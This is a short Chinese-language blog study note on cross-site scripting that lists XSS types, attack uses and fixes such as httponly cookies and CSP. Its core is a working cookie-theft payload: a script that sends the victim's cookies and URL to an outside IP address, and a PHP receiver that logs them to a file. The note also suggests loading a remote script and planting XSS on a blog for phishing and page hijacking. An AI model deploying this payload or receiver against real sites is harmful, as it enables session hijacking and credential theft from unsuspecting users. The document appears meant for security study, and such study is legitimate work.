漏洞原理:接受输入数据,输出显示数据后解析执行
基础类型:反射 ( 非持续 ) ,存储 ( 持续 ) , DOM-BASE
拓展类型: jquery , mxss , uxss , pdfxss , flashxss ,上传 xss 等
常用标签: https://www.freebuf.com/articles/web/340080.html
攻击利用:盲打, COOKIE 盗取,凭据窃取,页面劫持,网络钓鱼,权限维持等
安全修复:字符过滤,实例化编码, http_only , CSP 防护, WAF 拦截等
测试流程:看输出想输入在哪里,更改输入代码看执行(标签,过滤决定)
#XSS 跨站 - 攻击利用 - 凭据盗取
条件:无防护 Cookie 凭据获取
利用: XSS 平台或手写接受代码
触发: <script>var
url='http://47.94.236.117/getcookie.php?u='+window.location.href+
'&c='+document.cookie;document.write("<img src="+url+"
/>");</script>
接受:
<?php
url=_GET['u'];
cookie=_GET['c'];
fp = fopen('cookie.txt',"a");
fwrite(fp,url."\|".cookie."\n");
fclose($fp);
?>
#XSS 跨站 - 攻击利用 - 数据提交
条件:熟悉后台业务功能数据包,利用 JS 写一个模拟提交
利用:凭据获取不到或有防护无法利用凭据进入时执行其他
然后再写<script src="http://xx.xxx.xxx/poc.js"></script>
也可以主动钓鱼 比如 在自己博客放xss语句 然后进行页面劫持
XSS 跨站&Cookie 盗取&表单劫持&网络钓鱼&溯源分析&项目平台框架
我最厉害。,。2025-04-17 13:14
相关推荐
Kapaseker1 小时前
Compose 进阶—巧用 GraphicsLayer黄林晴1 小时前
Android17 为什么重写 MessageQueue阿巴斯甜1 天前
Android 报错:Zip file '/Users/lyy/develop/repoAndroidLapp/l-app-android-ble/app/buKapaseker1 天前
实战 Compose 中的 IntrinsicSizexq95271 天前
Andorid Google 登录接入文档黄林晴1 天前
告别 Modifier 地狱,Compose 样式系统要变天了冬奇Lab2 天前
Android触摸事件分发、手势识别与输入优化实战城东米粉儿2 天前
Android MediaPlayer 笔记Jony_2 天前
Android 启动优化方案阿巴斯甜2 天前
Android studio 报错:Cause: error=86, Bad CPU type in executable